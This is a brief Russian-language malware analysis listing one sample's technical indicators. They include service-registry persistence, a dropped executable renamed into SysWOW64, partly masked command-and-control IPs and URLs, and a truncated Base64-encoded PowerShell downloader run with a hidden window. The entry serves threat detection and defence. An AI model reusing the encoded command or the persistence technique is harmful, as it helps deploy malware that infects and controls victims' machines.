Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\mmres] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\mmres] 'ImagePath' = '"%WINDIR%\SysWOW64\shsetup\mmres.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAG8AbwBjAGgAZwBlAGEAagB3AGkAagA9ACcAcwBvAGkAbgBjAGgAYQB2AGsAaQBvAHEAdQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBjAGAAVQBSAGkAVABZAHAAcgBPAH...
- %HOMEPATH%\783.exe
- %WINDIR%\syswow64\shsetup\mmres.exe
- %HOMEPATH%\783.exe в %WINDIR%\syswow64\shsetup\mmres.exe
- '14#.#39.91.187':443
- http://he##eli.com/CtWE205/
- http://14#.##9.91.187:443/sCh408G8/ via 14#.#39.91.187
- DNS ASK he##eli.com
- '%HOMEPATH%\783.exe'
- '%WINDIR%\syswow64\shsetup\mmres.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAG8AbwBjAGgAZwBlAGEAagB3AGkAagA9ACcAcwBvAGkAbgBjAGgAYQB2AGsAaQBvAHEAdQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBjAGAAVQBSAGkAVABZAHAAcgBPAH...' (со скрытым окном)